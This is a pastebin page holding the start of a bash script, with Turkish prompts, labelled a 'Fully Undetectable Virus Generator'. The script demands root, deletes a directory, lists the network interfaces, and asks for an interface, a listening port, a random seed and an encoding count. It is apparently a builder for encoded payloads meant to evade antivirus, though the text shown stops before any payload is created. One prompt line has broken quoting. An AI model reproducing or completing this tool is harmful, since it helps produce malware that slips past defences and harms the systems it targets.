Psst.. new poll here.
Psst.. new forums here.
Microsoft is blocking us again (TY IP Reputation!) so just use oauth login instead. :)
Paste
Pasted as C by fatik ( 14 years ago )
#!/bin/bash
echo "************************************************************"
echo " Fully Undetectable Virus Generator "
echo " Script Coded by Cassie "
echo "************************************************************"
if [ "$(id -u)" != "0" ]; then
echo "Bu Script Root Yetkisiyle Calistirilmali!!" 1>&2
exit 1
fi
ping localhost -c 5 >nul
rm -rf seclabfatik
echo "Bilgisayarindaki Network Kartlari :"
cat /proc/net/dev | tr -s ' ' | cut -d ' ' -f1,2 | sed -e '1,2d'
echo -e "Hangi Network Arayuzunu Kullanmak Istiyorsun? \c"
read interface
echo -e "Hangi Port Numarasini Dinlememi Istiyorsun? : \c"
read port
echo -e "Ne Kadar Random Sayi Uretmek Istiyorsun? "-10000 : \c"
read seed
echo -e "Ne Kadar Encode Etmek Istiyorsun? 1-20 : \c"
read enumber
Revise this Paste